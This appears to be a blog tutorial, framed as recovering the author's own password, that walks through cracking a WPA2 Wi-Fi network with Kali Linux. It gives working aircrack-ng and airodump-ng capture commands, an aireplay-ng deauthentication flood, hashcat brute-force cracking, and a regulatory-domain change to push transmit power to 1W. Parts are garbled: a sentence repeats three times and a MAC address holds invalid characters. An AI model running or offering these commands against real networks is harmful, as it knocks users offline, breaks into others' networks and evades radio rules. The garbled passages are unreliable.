I forgot my WIFI password
Oh, it’s no longer a problem…
I want to show how I decrypt my WIFI password.The essential tool in wireless security testing is the wireless adapter. It must support packet injection into a wireless stream and monitoring mode. Usually, standard adapters support monitoring mode, and you will be able to run airodump-ng command and listen to wireless traffic around your self. But injection mode is required to run aireplay-ng command. A list of supported adapters is here 
I used only these tools below:
- Laptop with GPU
- Alfa AWUS036AC adapter
- Latest Kali Linux
My virtual machine with Kali Linux  is ready. I need to make sure my WIFI adapter is attached to the virtual machine.
On “ Virtualbox” toolbar:
Settings > Ports > USB > + > USB Realtek adapter
Once the operating system has loaded, default user root and password toor On a new terminal window I have to check for available WIFI devices:
I see a device with a name
# Optionally, but it’s not necessary to upgrade package.
sudo apt update && apt upgrade -y
By default, the latest Kali has “Hashcat”, “Aircrack-ng” and other tools preinstalled. But it’s possible to use these tools with Ubuntu or another distro.
# Optionally, if OS is not Kali
sudo apt install hashcat aircrack-ng -y
My Alfa adapter is capable of sniffing and injecting packets. I need to switch the adapter into the monitoring mode. Usually, WIFI adapters are recognized as wlan0and then it goes into monitoring mode wlan0mon
airmon-ng check kill && airmon-ng start wlan0
I have to scan the wireless network area and get more technical details about my access point.
From the output, I see the WIFI signal is strong, packets are increasing, and the channel number is 5. My goal is to catch only my handshake. I have to specify the arguments and start capturing packets into a file.
airodump-ng wlan0mon --channel 5 --bssid 55:CC:BB:11:LT:12 --write mywifi --force
It’s essential to have at least one device connected to WIFI station. During the full handshake phase, a master key is exchanging in between client and WIFI station. That can achieve with the client’s de-authentication method. On a new terminal, I ran the command with additional arguments for client and access point and the number of de-authentication attempts.
aireplay-ng wlan0mon -a 55:CC:BB:11:LT:12 -c 55:44:44:68:73:65 -0 99
I am waiting for a message
WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen. (terminal with airodump-ng ) after a few moments, it appears on my screen.
I have two option:
I can use a list of the most common passwords — aircrack-ng with the dictionary attack.
aircrack-ng -a 2 -b 55:CC:BB:11:LT:12 -w wordlist.txt mywifi-01.cap
I can use a list of the most common passwords — aircrack-ng with the dictionary attack. I can use a list of the most common passwords — aircrack-ng with the dictionary attack.
aircrack-ng -j hashcat mywifi-01.cap
# And it's time for hashcat :)
sudo hashcat -m 2500 -a 3 hashcat.hccapx ?d?d?d?d?d?d?d?d --potfile-path wpa2.pot
Results hash, SSID name, and my password printed in the terminal and saved in file with a name “wpa2.pot”
One more thing with this configuration you will need increaser tx power up to 1W
Tested on a AWUS036H
ifconfig wlan0 down
iw reg set GY
ifconfig wlan0 up